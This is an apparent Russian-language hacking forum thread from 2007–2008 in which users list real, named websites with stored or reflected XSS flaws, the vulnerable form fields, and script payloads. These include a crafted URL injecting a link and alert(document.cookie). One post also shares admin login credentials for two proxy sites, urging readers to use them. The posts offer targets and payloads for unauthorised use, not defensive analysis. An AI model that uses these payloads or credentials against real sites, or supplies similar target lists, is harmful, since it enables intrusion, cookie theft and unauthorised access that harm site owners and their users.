Хранимые XSS

Discussion in 'Уязвимости' started by +toxa+, 18 Mar 2007.

  1. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Еще здесь такой же форум и как следствие тут тоже активная xss в заголовке темы на форуме.

    http://forum.deti.mail.ru/
     
    11 people like this.
  2. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    [NoNaMe] nnm.ru

    Идем в http://doci.nnm.ru/newdoc и создаем новый док.
    Уязвимо поле "Название дока".
     
  3. Shred

    Shred Elder - Старейшина

    Joined:
    22 May 2006
    Messages:
    200
    Likes Received:
    29
    Reputations:
    0
    во первых ограничение на 30 символов, во-вторых название локи <h1>doc</h1> отобразилось как есть :(
     
  4. Doom123

    Doom123 Elder - Старейшина

    Joined:
    11 Nov 2006
    Messages:
    749
    Likes Received:
    244
    Reputations:
    22
    http://www.origitea.ru/default.aspx?404;http://www.origitea.ru:80/guest

    Визде пишем <script>alert()</script>
     
  5. Travka

    Travka New Member

    Joined:
    24 Oct 2006
    Messages:
    1
    Likes Received:
    1
    Reputations:
    0
    http://memori.ru
    регаемся
    в поле имя или фамилия пишем
    <script>alert()</script>
    смотрим профиль
     
    1 person likes this.
  6. echobyte

    echobyte Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    463
    Likes Received:
    190
    Reputations:
    50
    www.pcweek.ru

    уязвимы комментарии

    пример http://www.pcweek.ru/themes/detail.php?ID=109663&THEME_ID=0&SPHERE_ID=?add-comment
     
    1 person likes this.
  7. YoYo Factory

    YoYo Factory Elder - Старейшина

    Joined:
    24 Mar 2008
    Messages:
    108
    Likes Received:
    79
    Reputations:
    -5
    /

    Уязвима Регистрация
    Ни одно поле не фильтруется

    "><script>('XSS')</script>
     
    #167 YoYo Factory, 11 May 2008
    Last edited: 11 May 2008
  8. N1K70

    N1K70 Banned

    Joined:
    2 Jan 2008
    Messages:
    161
    Likes Received:
    76
    Reputations:
    21
    хсс в модуле, после http://www.asapmachineco.com/index.php?module=ath&banner=> можно прописать любую команду... ну юзайте короче )))
    Code:
    http://www.asapmachineco.com/index.php?module=ath&banner=><a href=http://for-hack.ru>N1K70_SITE</a><script>alert(document.cookie)</script>
     
    1 person likes this.
  9. ДеЦл

    ДеЦл Banned

    Joined:
    7 May 2008
    Messages:
    10
    Likes Received:
    16
    Reputations:
    -6
    ИдиВЖопу.ру

    Уязвимы поля "текст под картинкой" и "над картинкой"
    Пример:

    (с) Лигендо...
     
  10. М.Боярский

    Joined:
    5 May 2008
    Messages:
    12
    Likes Received:
    22
    Reputations:
    6
    Kanalia.ru - сайт обо мне!
    в каментах галлереи не фильтруеццо имя отправителя
    http://kanalia.ru/gallery/
     
    3 people like this.
  11. echobyte

    echobyte Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    463
    Likes Received:
    190
    Reputations:
    50
    1 person likes this.
  12. КВР

    КВР Elder - Старейшина

    Joined:
    23 Apr 2008
    Messages:
    16
    Likes Received:
    30
    Reputations:
    -2
    _http://checkproxy.nnm.netserv.name/
    admin
    123456

    _http://queen-love.com/proxy5/
    admin
    123456

    Юзайте и не просите больше никого о халявных прокси.
     
  13. echobyte

    echobyte Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    463
    Likes Received:
    190
    Reputations:
    50
  14. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    Chronicle.com - Деньги
     
  15. Kusto

    Kusto Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    886
    Likes Received:
    678
    Reputations:
    510
    http://www.all-biz.info/ru/

    при регистрации уязвимы пактически все поля(для активных XSS), вчастности поле "о предриятии", зарегиться до конца неудалось- за регу требют 35400 руб
    ну а чтоб вам небыло скушно вот вам хоть и пассивная но тоже XSS)))
    http://www.all-biz.info/ru/enterprises/?btn_search=1&findentry=%3Cscript%3Ealert%28%27%D0%B1%D0%B0%D0%BC%D1%81%27%29%3C%2Fscript%3E&cs=&ac_category=&btn_search=%D0%98%D1%81%D0%BA%D0%B0%D1%82%D1%8C
     
    1 person likes this.
  16. Buffalon

    Buffalon Elder - Старейшина

    Joined:
    22 Mar 2008
    Messages:
    241
    Likes Received:
    34
    Reputations:
    8
    http://o-sport.ru/guestbook/index.php

    0Й... .Вводите в гостевой
    <script>alert()</script>
    и всё
     
    1 person likes this.
  17. D9D9_VAD9

    D9D9_VAD9 Elder - Старейшина

    Joined:
    15 Apr 2008
    Messages:
    136
    Likes Received:
    97
    Reputations:
    5
    svadbann.ru

    Гостевая книга
    http://www.svadbann.ru/q_answer.html

    Активны все три поля, сообщение, имя, мыло
     
    1 person likes this.
  18. echobyte

    echobyte Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    463
    Likes Received:
    190
    Reputations:
    50
    http://classifieds.invictory.org
    уязвимы обьявления
     
  19. otmorozok428

    otmorozok428 Banned

    Joined:
    19 Oct 2007
    Messages:
    127
    Likes Received:
    88
    Reputations:
    17
    Сайт Российских Сутенёров

    http://www.suter.ru/blacklist.html

    POST-форма, поле "Дополнительно:
    (краткое описание происшетшего)"


     
    1 person likes this.
  20. fatalo

    fatalo Elder - Старейшина

    Joined:
    15 May 2008
    Messages:
    45
    Likes Received:
    46
    Reputations:
    5
    karaul.ru/
    Xss найдена в добавление комментария.
    Вот пример:
    HTML:
    _http://karaul.ru/30.12.2004/13/comments
    _http://karaul.ru/09.06.2008/11/comments
    В поле имя вводите стандартное:
    PHP:
    <script>alert('antichat.ru')</script>
    И получаете желаемое!Хочу сказать,что караул.ру является довольно посещаемым ресурсом.